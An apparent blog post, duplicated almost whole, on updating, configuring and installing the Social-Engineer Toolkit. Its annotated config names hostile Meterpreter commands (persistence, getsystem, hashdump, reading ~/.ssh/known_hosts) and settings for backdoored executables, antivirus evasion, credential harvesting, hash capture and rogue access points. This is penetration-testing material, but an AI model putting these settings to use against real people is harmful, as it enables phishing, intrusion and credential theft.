The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social-engineer.org launch and has quickly became a standard tool in a penetration testers arsenal. SET was written by David Kennedy (ReL1K) and with a lot of help from the community it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.
1 Beginning with the Social Engineer Toolkit
2 SET’s Menu
3 Attack Vectors
3.1 Spear-Phishing Attack Vector
3.2 Java Applet Attack Vector
3.3 Metasploit Browser Exploit Method
3.4 Credential Harvester Attack Method
3.5 Tabnabbing Attack Method
3.6 Man Left in the Middle Attack Method
3.7 Web Jacking Attack Method
3.8 Multi-Attack Web Vector
3.9 Infectious Media Generator
3.10 Teensy USB HID Attack Vector
4 Frequently Asked Questions
4.1 Q. I’m using NAT/Port forwarding, how can I configure SET to support this scenario?
4.2 Q. My Java Applet isn’t working correctly and don’t get prompted for the Applet when browsing the site.
Beginning with the Social Engineer Toolkit
The brains behind SET is its configuration file. SET by default works perfect for most people however, advanced customization may be needed in order to ensure that the attack vectors go off without a hitch. First thing to do is ensure that you have updated SET, from the directory:
root@bt:/pentest/exploits/SET# svn update
U src/payloadgen/payloadgen.py
U src/java_applet/Java.java
U src/java_applet/jar_file.py
U src/web_clone/cloner.py
U src/msf_attacks/create_payload.py
U src/harvester/scraper.py
U src/html/clientside/gen_payload.py
U src/html/web_server.py
U src/arp_cache/arp_cache.py
U set
U readme/CHANGES
Updated to revision 319.
root@bt:/pentest/exploits/SET#
Once you’ve updated to the latest version, start tweaking your attack by editing the SET configuration file. Here is my latest SET_CONFIG
root@bt:/pentest/exploits/set# nano config/set_config
### Define the path to MetaSploit, for example: /pentest/exploits/framework3
METASPLOIT_PATH=/opt/metasploit-4.4.0/msf3/
#
### This will tell what database to use when using the MetaSploit functionality. Default is PostgreSQL
METASPLOIT_DATABASE=postgresql
#
### How many times SET should encode a payload if you are using standard MetaSploit encoding options
ENCOUNT=4
#
### If this options i set, the MetaSploit payloads will automatically migrate to
### notepad once the applet is executed. This is beneficial if the victim closes
### the browser, however can introduce buggy results when auto migrating.
### NOTE: This will make bypassuac not work properly. Migrate to a different process to get it to work.
AUTO_MIGRATE=ON
#
### Custom exe you want to use for MetaSploit encoding, this usually has better av
### detection. Currently it is set to legit.binary which is just calc.exe. An example
### you could use would be putty.exe so this field would be /pathtoexe/putty.exe
CUSTOM_EXE=legit.binary
#
### This is for the backdoored executable if you want to keep the executable to still work. Normally
### when legit.binary is used, it will render the application useless. Specifying this will keep the
### application working
BACKDOOR_EXECUTION=ON
#
### Here we can run multiple meterpreter scripts once a session is active. This
### may be important if we are sleeping and need to run persistence, try to elevate
### permissions and other tasks in an automated fashion. First turn this trigger on
### then configure the flags. Note that you need to separate the commands by a ;
METERPRETER_MULTI_SCRIPT=OFF
LINUX_METERPRETER_MULTI_SCRIPT=OFF
#
### What commands do you want to run once a meterpreter session has been established.
### Be sure if you want multiple commands to separate with a ;. For example you could do
### run getsystem;run hashdump;run persistence to run three different commands
METERPRETER_MULTI_COMMANDS=run persistence -r 192.168.1.5 -p 21 -i 300 -X -A;getsystem
LINUX_METERPRETER_MULTI_COMMANDS=uname;id;cat ~/.ssh/known_hosts
#
### This is the port that is used for the iFrame injection using the metasploit browser attacks.
### By default this port is 8080 however egress filtering may block this. May want to adjust to
### something like 21 or 53
METASPLOIT_IFRAME_PORT=8080
#
### Define to use Ettercap or not when using website attack only - set to ON and OFF
ETTERCAP=OFF
#
### Ettercap home directory (needed for DNS_spoof)
ETTERCAP_PATH=/usr/share/ettercap
#
### Specify what interface you want ettercap or DSNiff to listen on, if nothing will default
ETTERCAP_INTERFACE=eth0
#
### Define to use dsniff or not when using website attack only - set to on and off
### If dsniff is set to on, ettercap will automatically be disabled.
DSNIFF=OFF
#
### Auto detection of IP address interface utilizing Google, set this ON if you want
AUTO_DETECT=OFF
#
### SendMail ON or OFF for spoofing email addresses
SENDMAIL=OFF
#
### Email provider list supports GMail, Hotmail, and Yahoo. Simply change it to the provider you want.
EMAIL_PROVIDER=GMAIL
#
### Set to ON if you want to use Email in conjunction with webattack
WEBATTACK_EMAIL=OFF
#
### Man Left In The Middle port, this will be used for the web server bind port
MLITM_PORT=80
#
### Use Apache instead of the standard Python web server. This will increase the speed
### of the attack vector.
APACHE_SERVER=OFF
#
### Path to the Apache web root
APACHE_DIRECTORY=/var/www
#
### Specify what port to run the http server off of that serves the java applet attack
### or metasploit exploit. Default is port 80. This also goes if you are using apache_server equal on.
### You need to specify what port Apache is listening on in order for this to work properly.
WEB_PORT=80
#
### Create self-signed Java applets and spoof publisher note this requires you to
### install ---> Java 6 JDK, BT5 or Ubuntu users: apt-get install openjdk-6-jdk
### If this is not installed it will not work. Can also do: apt-get install sun-java6-jdk
SELF_SIGNED_APPLET=OFF
#
### This flag will set the java id flag within the java applet to something different.
### This could be to make it look more believable or for better obfuscation
JAVA_ID_PARAM=Secure Java Applet
#
### Java applet repeater option will continue to prompt the user with the java applet if
### the user hits cancel. This means it will be non stop until run is executed. This gives
### a better success rate for the Java applet attack
JAVA_REPEATER=ON
#
### Java repeater timing which is the delay it takes between the user hitting cancel to
### when the next Java applet runs. Be careful setting to low as it will spawn them over
### and over even if they hit run. 200 equals 2 seconds.
JAVA_TIME=200
#
### Turn on ssl certificates for set secure communications through web_attack vector
WEBATTACK_SSL=OFF
#
### Path to the pem file to utilize certificates with the web attack vector (required)
### You can create your own utilizing set, just turn on self_signed_cert
### If your using this flag, ensure openssl is installed! To turn this on turn SELF_SIGNED_CERT
### to the on position.
SELF_SIGNED_CERT=OFF
#
### Below is the client/server (private) cert, this must be in pem format in order to work
### Simply place the path you want. For example /root/ssl_client/server.pem
PEM_CLIENT=/root/newcert.pem
PEM_SERVER=/root/newreq.pem
#
### Tweak the web jacking time used for the iFrame replace, sometimes it can be a little slow
### and harder to convince the victim. 5000 = 5 seconds
WEBJACKING_TIME=2000
#
### Command center interface to bind to by default it is localhost only. If you want to enable it
### so you can hit the command center remotely put the interface to 0.0.0.0 to bind to all interfaces.
COMMAND_CENTER_INTERFACE=127.0.0.1
#
### Port for the command center
COMMAND_CENTER_PORT=44444
#
### This will remove the set interactive shell from the menu selection. The SET payloads are large in nature
### and things like the pwniexpress need smaller set builds
SET_INTERACTIVE_SHELL=ON
#
### What do you want to use for your default terminal within the command center. The default is xterm
### the options you have are as follow - gnome, konsole, xterm, solo. If you select solo it will place
### all results in the same shell you used to open the set-web interface. This is useful if your using
### something that only has one console, such as an iPhone or iPad.
TERMINAL=SOLO
#
### Digital signature stealing method must have the pefile Python modules loaded
### from http://code.google.com/p/pefile/. Be sure to install this before turning
### this flag on!!! This flag gives much better AV detection
DIGITAL_SIGNATURE_STEAL=ON
#
### These two options will turn the upx packer to on and automatically attempt
### to pack the executable which may evade anti-virus a little better.
UPX_ENCODE=ON
UPX_PATH=/opt/set/upx-3.08-i386_linux/upx
#
### This feature will turn on or off the automatic redirection. By default for example in multi-attack
### the site will redirect once one successful attack is used. Some people may want to use Java applet
### and credential harvester for example.
AUTO_REDIRECT=ON
#
### This will redirect the harvester victim to this website once executed and not to the original website.
### For example if you clone abcompany.com and below it says blahblahcompany.com, it will redirect there instead.
### THIS IS USEFUL IF YOU WANT TO REDIRECT THE VICTIM TO AN ADDITIONAL SITE AFTER HARVESTER HAS TAKEN THE CREDENTIALS.
### SIMPLY TURN HARVESTER REDIRECT TO ON THEN ENTER HTTP://WEBSITEOFYOURCHOOSING.COM IN THE HARVESTER URL BELOW
### TO CHANGE.
HARVESTER_REDIRECT=OFF
HARVESTER_URL=http://thishasnotbeenset
#
### This feature will auto embed a img src tag to a unc path of your attack machine.
### Useful if you want to intercept the half lm keys with rainbowtables. What will happen
### is as soon as the victim clicks the web-page link, a unc path will be initiated
### and the metasploit capture/smb module will intercept the hash values.
UNC_EMBED=OFF
#
### This feature will attempt to turn create a rogue access point and redirect victims back to the
### set web server when associated. airbase-ng and dnsspoof.
ACCESS_POINT_SSID=linksys
AIRBASE_NG_PATH=/usr/local/sbin/airbase-ng
DNSSPOOF_PATH=/usr/local/sbin/dnsspoof
#
### This will configure the default channel that the wireless access point attack broadcasts on through wifi
### communications.
AP_CHANNEL=9
#
### This will enable the powershell shellcode injection technique with each java applet. It will be used as
### a second form in case the first method fails.
POWERSHELL_INJECTION=ON
#
### This will display the output of the powershell injection attack so you can see what is being placed on the
### system.
POWERSHELL_VERBOSE=OFF
#
### This will profile the victim machine and check for installed versions and report back on them
### note this is currently disabled. Development is underway on this feature
WEB_PROFILER=OFF
#
### Port numbers for the java applet attack linux/osx attacks, reverse payloads
OSX_REVERSE_PORT=8080
LINUX_REVERSE_PORT=8081
#
### User agent string for when using anything that clones the website, this user agent will be used
USER_AGENT_STRING=Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
#
### The way the set interactive shell works is it first deploys a stager payload that pulls an additional executable.
### The downloader is currently being picked up by a/v and is actually somewhat hard to obfuscate because it does
### similar characteristics of a download/exec. If you turn this feature on, set will download the interactive shell
### straight without using the stager. Only issue with this is there may be a delay on the user end however still
### shouldn't be noticed
SET_SHELL_STAGER=OFF
#
### Disables automatic listener - turn this off if you don't want a metasploit listener in the background.
AUTOMATIC_LISTENER=ON
#
### This will disable the functionality if metasploit is not installed and you just want to use setoolkit or ratte for payloads
### or the other attack vectors.
METASPLOIT_MODE=ON
#
### THIS WILL TURN OFF DEPLOYMENT OF BINARIES FOR THE JAVA APPLET ATTACK AND ONLY USE THE POWERSHELL METHOD.
### NOTE THAT POWERSHELL_INJECTION MUST BE SET TO ON
DEPLOY_BINARIES=YES
#
### THIS IS FOR DEBUG PURPOSES ONLY. THIS WILL REMOVE THE CLEANUP FUNCTIONALITY WITHIN SET TO DEBUG FILE STATES
CLEANUP_ENABLED_DEBUG=OFF
#######################################################################################################################################
================
1.How to run SET.
---------------------------
root@:/opt/metasploit3/set# ./set
It will appear an error as below.
[!] ERROR:BeautifulSoup is required in order to fully run SET
[!] Please download and install BeautifulSoup: http://www.crummy.com/software/BeautifulSoup/download/3.x/BeautifulSoup-3.2.0.tar.gz
set> Would you like SET to attempt to install it for you? [yes|no]: yes
After that it will as for " Do you agree to the terms of service [y/n]: y "
Finally you may RUN the SET Tool.
Error Occur and Solution.
=============
1)UPX and PEFILE Error once generated payload(Avoid AV detection).
-------------------------------------------------------------------------------------------------
a)Please download UPX at UPX
-extract it in SET directory and edit path in the set_config
b)Please download PEFILE at given link(Once error it will pop-up the link)
-extract it in SET directory and chmod +x setup.py
-then install it ./setup.py install
2)Unable to update Metasploit via Set
=====================
a)Subversion error.Must upgrade to Subversion 1.7
Then check svn version.
= EOF =
Courtesy of http://www.social-engineer.org (Official site of SET)
p/s : I dont use Backtrack.. I install it plain for my Ubuntu Box :)
svn co http://svn.trustedsec.com/social_engineering_toolkit set/
Computer Based Social Engineering Tools: Social Engineer Toolkit (SET)
The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social-engineer.org launch and has quickly became a standard tool in a penetration testers arsenal. SET was written by David Kennedy (ReL1K) and with a lot of help from the community it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.
1 Beginning with the Social Engineer Toolkit
2 SET’s Menu
3 Attack Vectors
3.1 Spear-Phishing Attack Vector
3.2 Java Applet Attack Vector
3.3 Metasploit Browser Exploit Method
3.4 Credential Harvester Attack Method
3.5 Tabnabbing Attack Method
3.6 Man Left in the Middle Attack Method
3.7 Web Jacking Attack Method
3.8 Multi-Attack Web Vector
3.9 Infectious Media Generator
3.10 Teensy USB HID Attack Vector
4 Frequently Asked Questions
4.1 Q. I’m using NAT/Port forwarding, how can I configure SET to support this scenario?
4.2 Q. My Java Applet isn’t working correctly and don’t get prompted for the Applet when browsing the site.
Beginning with the Social Engineer Toolkit
The brains behind SET is its configuration file. SET by default works perfect for most people however, advanced customization may be needed in order to ensure that the attack vectors go off without a hitch. First thing to do is ensure that you have updated SET, from the directory:
root@bt:/pentest/exploits/SET# svn update
U src/payloadgen/payloadgen.py
U src/java_applet/Java.java
U src/java_applet/jar_file.py
U src/web_clone/cloner.py
U src/msf_attacks/create_payload.py
U src/harvester/scraper.py
U src/html/clientside/gen_payload.py
U src/html/web_server.py
U src/arp_cache/arp_cache.py
U set
U readme/CHANGES
Updated to revision 319.
root@bt:/pentest/exploits/SET#
Once you’ve updated to the latest version, start tweaking your attack by editing the SET configuration file. Here is my latest SET_CONFIG
root@bt:/pentest/exploits/set# nano config/set_config
### Define the path to MetaSploit, for example: /pentest/exploits/framework3
METASPLOIT_PATH=/opt/metasploit-4.4.0/msf3/
#
### This will tell what database to use when using the MetaSploit functionality. Default is PostgreSQL
METASPLOIT_DATABASE=postgresql
#
### How many times SET should encode a payload if you are using standard MetaSploit encoding options
ENCOUNT=4
#
### If this options i set, the MetaSploit payloads will automatically migrate to
### notepad once the applet is executed. This is beneficial if the victim closes
### the browser, however can introduce buggy results when auto migrating.
### NOTE: This will make bypassuac not work properly. Migrate to a different process to get it to work.
AUTO_MIGRATE=ON
#
### Custom exe you want to use for MetaSploit encoding, this usually has better av
### detection. Currently it is set to legit.binary which is just calc.exe. An example
### you could use would be putty.exe so this field would be /pathtoexe/putty.exe
CUSTOM_EXE=legit.binary
#
### This is for the backdoored executable if you want to keep the executable to still work. Normally
### when legit.binary is used, it will render the application useless. Specifying this will keep the
### application working
BACKDOOR_EXECUTION=ON
#
### Here we can run multiple meterpreter scripts once a session is active. This
### may be important if we are sleeping and need to run persistence, try to elevate
### permissions and other tasks in an automated fashion. First turn this trigger on
### then configure the flags. Note that you need to separate the commands by a ;
METERPRETER_MULTI_SCRIPT=OFF
LINUX_METERPRETER_MULTI_SCRIPT=OFF
#
### What commands do you want to run once a meterpreter session has been established.
### Be sure if you want multiple commands to separate with a ;. For example you could do
### run getsystem;run hashdump;run persistence to run three different commands
METERPRETER_MULTI_COMMANDS=run persistence -r 192.168.1.5 -p 21 -i 300 -X -A;getsystem
LINUX_METERPRETER_MULTI_COMMANDS=uname;id;cat ~/.ssh/known_hosts
#
### This is the port that is used for the iFrame injection using the metasploit browser attacks.
### By default this port is 8080 however egress filtering may block this. May want to adjust to
### something like 21 or 53
METASPLOIT_IFRAME_PORT=8080
#
### Define to use Ettercap or not when using website attack only - set to ON and OFF
ETTERCAP=OFF
#
### Ettercap home directory (needed for DNS_spoof)
ETTERCAP_PATH=/usr/share/ettercap
#
### Specify what interface you want ettercap or DSNiff to listen on, if nothing will default
ETTERCAP_INTERFACE=eth0
#
### Define to use dsniff or not when using website attack only - set to on and off
### If dsniff is set to on, ettercap will automatically be disabled.
DSNIFF=OFF
#
### Auto detection of IP address interface utilizing Google, set this ON if you want
AUTO_DETECT=OFF
#
### SendMail ON or OFF for spoofing email addresses
SENDMAIL=OFF
#
### Email provider list supports GMail, Hotmail, and Yahoo. Simply change it to the provider you want.
EMAIL_PROVIDER=GMAIL
#
### Set to ON if you want to use Email in conjunction with webattack
WEBATTACK_EMAIL=OFF
#
### Man Left In The Middle port, this will be used for the web server bind port
MLITM_PORT=80
#
### Use Apache instead of the standard Python web server. This will increase the speed
### of the attack vector.
APACHE_SERVER=OFF
#
### Path to the Apache web root
APACHE_DIRECTORY=/var/www
#
### Specify what port to run the http server off of that serves the java applet attack
### or metasploit exploit. Default is port 80. This also goes if you are using apache_server equal on.
### You need to specify what port Apache is listening on in order for this to work properly.
WEB_PORT=80
#
### Create self-signed Java applets and spoof publisher note this requires you to
### install ---> Java 6 JDK, BT5 or Ubuntu users: apt-get install openjdk-6-jdk
### If this is not installed it will not work. Can also do: apt-get install sun-java6-jdk
SELF_SIGNED_APPLET=OFF
#
### This flag will set the java id flag within the java applet to something different.
### This could be to make it look more believable or for better obfuscation
JAVA_ID_PARAM=Secure Java Applet
#
### Java applet repeater option will continue to prompt the user with the java applet if
### the user hits cancel. This means it will be non stop until run is executed. This gives
### a better success rate for the Java applet attack
JAVA_REPEATER=ON
#
### Java repeater timing which is the delay it takes between the user hitting cancel to
### when the next Java applet runs. Be careful setting to low as it will spawn them over
### and over even if they hit run. 200 equals 2 seconds.
JAVA_TIME=200
#
### Turn on ssl certificates for set secure communications through web_attack vector
WEBATTACK_SSL=OFF
#
### Path to the pem file to utilize certificates with the web attack vector (required)
### You can create your own utilizing set, just turn on self_signed_cert
### If your using this flag, ensure openssl is installed! To turn this on turn SELF_SIGNED_CERT
### to the on position.
SELF_SIGNED_CERT=OFF
#
### Below is the client/server (private) cert, this must be in pem format in order to work
### Simply place the path you want. For example /root/ssl_client/server.pem
PEM_CLIENT=/root/newcert.pem
PEM_SERVER=/root/newreq.pem
#
### Tweak the web jacking time used for the iFrame replace, sometimes it can be a little slow
### and harder to convince the victim. 5000 = 5 seconds
WEBJACKING_TIME=2000
#
### Command center interface to bind to by default it is localhost only. If you want to enable it
### so you can hit the command center remotely put the interface to 0.0.0.0 to bind to all interfaces.
COMMAND_CENTER_INTERFACE=127.0.0.1
#
### Port for the command center
COMMAND_CENTER_PORT=44444
#
### This will remove the set interactive shell from the menu selection. The SET payloads are large in nature
### and things like the pwniexpress need smaller set builds
SET_INTERACTIVE_SHELL=ON
#
### What do you want to use for your default terminal within the command center. The default is xterm
### the options you have are as follow - gnome, konsole, xterm, solo. If you select solo it will place
### all results in the same shell you used to open the set-web interface. This is useful if your using
### something that only has one console, such as an iPhone or iPad.
TERMINAL=SOLO
#
### Digital signature stealing method must have the pefile Python modules loaded
### from http://code.google.com/p/pefile/. Be sure to install this before turning
### this flag on!!! This flag gives much better AV detection
DIGITAL_SIGNATURE_STEAL=ON
#
### These two options will turn the upx packer to on and automatically attempt
### to pack the executable which may evade anti-virus a little better.
UPX_ENCODE=ON
UPX_PATH=/opt/set/upx-3.08-i386_linux/upx
#
### This feature will turn on or off the automatic redirection. By default for example in multi-attack
### the site will redirect once one successful attack is used. Some people may want to use Java applet
### and credential harvester for example.
AUTO_REDIRECT=ON
#
### This will redirect the harvester victim to this website once executed and not to the original website.
### For example if you clone abcompany.com and below it says blahblahcompany.com, it will redirect there instead.
### THIS IS USEFUL IF YOU WANT TO REDIRECT THE VICTIM TO AN ADDITIONAL SITE AFTER HARVESTER HAS TAKEN THE CREDENTIALS.
### SIMPLY TURN HARVESTER REDIRECT TO ON THEN ENTER HTTP://WEBSITEOFYOURCHOOSING.COM IN THE HARVESTER URL BELOW
### TO CHANGE.
HARVESTER_REDIRECT=OFF
HARVESTER_URL=http://thishasnotbeenset
#
### This feature will auto embed a img src tag to a unc path of your attack machine.
### Useful if you want to intercept the half lm keys with rainbowtables. What will happen
### is as soon as the victim clicks the web-page link, a unc path will be initiated
### and the metasploit capture/smb module will intercept the hash values.
UNC_EMBED=OFF
#
### This feature will attempt to turn create a rogue access point and redirect victims back to the
### set web server when associated. airbase-ng and dnsspoof.
ACCESS_POINT_SSID=linksys
AIRBASE_NG_PATH=/usr/local/sbin/airbase-ng
DNSSPOOF_PATH=/usr/local/sbin/dnsspoof
#
### This will configure the default channel that the wireless access point attack broadcasts on through wifi
### communications.
AP_CHANNEL=9
#
### This will enable the powershell shellcode injection technique with each java applet. It will be used as
### a second form in case the first method fails.
POWERSHELL_INJECTION=ON
#
### This will display the output of the powershell injection attack so you can see what is being placed on the
### system.
POWERSHELL_VERBOSE=OFF
#
### This will profile the victim machine and check for installed versions and report back on them
### note this is currently disabled. Development is underway on this feature
WEB_PROFILER=OFF
#
### Port numbers for the java applet attack linux/osx attacks, reverse payloads
OSX_REVERSE_PORT=8080
LINUX_REVERSE_PORT=8081
#
### User agent string for when using anything that clones the website, this user agent will be used
USER_AGENT_STRING=Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
#
### The way the set interactive shell works is it first deploys a stager payload that pulls an additional executable.
### The downloader is currently being picked up by a/v and is actually somewhat hard to obfuscate because it does
### similar characteristics of a download/exec. If you turn this feature on, set will download the interactive shell
### straight without using the stager. Only issue with this is there may be a delay on the user end however still
### shouldn't be noticed
SET_SHELL_STAGER=OFF
#
### Disables automatic listener - turn this off if you don't want a metasploit listener in the background.
AUTOMATIC_LISTENER=ON
#
### This will disable the functionality if metasploit is not installed and you just want to use setoolkit or ratte for payloads
### or the other attack vectors.
METASPLOIT_MODE=ON
#
### THIS WILL TURN OFF DEPLOYMENT OF BINARIES FOR THE JAVA APPLET ATTACK AND ONLY USE THE POWERSHELL METHOD.
### NOTE THAT POWERSHELL_INJECTION MUST BE SET TO ON
DEPLOY_BINARIES=YES
#
### THIS IS FOR DEBUG PURPOSES ONLY. THIS WILL REMOVE THE CLEANUP FUNCTIONALITY WITHIN SET TO DEBUG FILE STATES
CLEANUP_ENABLED_DEBUG=OFF
#######################################################################################################################################
================
1.How to run SET.
---------------------------
root@:/opt/metasploit3/set# ./set
It will appear an error as below.
[!] ERROR:BeautifulSoup is required in order to fully run SET
[!] Please download and install BeautifulSoup: http://www.crummy.com/software/BeautifulSoup/download/3.x/BeautifulSoup-3.2.0.tar.gz
set> Would you like SET to attempt to install it for you? [yes|no]: yes
After that it will as for " Do you agree to the terms of service [y/n]: y "
Finally you may RUN the SET Tool.
Error Occur and Solution.
=============
1)UPX and PEFILE Error once generated payload(Avoid AV detection).
-------------------------------------------------------------------------------------------------
a)Please download UPX at UPX
-extract it in SET directory and edit path in the set_config
b)Please download PEFILE at given link(Once error it will pop-up the link)
-extract it in SET directory and chmod +x setup.py
-then install it ./setup.py install
2)Unable to update Metasploit via Set
=====================
a)Subversion error.Must upgrade to Subversion 1.7
$ sudo apt-add-repository ppa:dominik-stadler/subversion-1.7
# apt-get update && apt-get upgrade && apt-get dist-upgrade
Then check svn version.
# svn --version
svn, version 1.7.4 (r1295709)
compiled Mar 15 2012, 20:31:22
Assume you dont have subversion after the update. sudo apt-get install subversion
= EOF =
Courtesy of http://www.social-engineer.org (Official site of SET)
p/s : I dont use Backtrack.. I install it plain for my Ubuntu Box :)
Subscribe to:
Posts (Atom)